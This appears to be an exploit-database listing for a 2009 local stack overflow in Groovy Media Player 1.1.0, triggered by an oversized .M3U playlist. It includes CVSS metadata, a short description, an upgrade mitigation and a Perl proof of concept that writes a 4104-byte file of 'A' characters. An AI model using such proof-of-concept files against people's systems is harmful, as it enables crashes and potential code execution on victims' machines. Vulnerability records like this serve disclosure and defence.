header-logo
Suggest Exploit
vendor:
Groovy Media Player
by:
milw0rm.com
9,3
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Groovy Media Player
Affected Version From: 1.1.0
Affected Version To: 1.1.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:groovy_media_player:groovy_media_player:1.1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Groovy Media Player Version 1.1.0 (.M3U File) Local Stack Overflow POC

A stack overflow vulnerability exists in Groovy Media Player Version 1.1.0 when handling .M3U files. An attacker can exploit this vulnerability by creating a malicious .M3U file containing 4104 bytes of data and then convincing a user to open the file. This will cause a stack overflow and allow the attacker to execute arbitrary code on the user's system.

Mitigation:

Upgrade to the latest version of Groovy Media Player.
Source

Exploit-DB raw data:

# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #  Groovy Media Player Version 1.1.0 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-20]

Navigation

Suggest Exploit

Services By CQR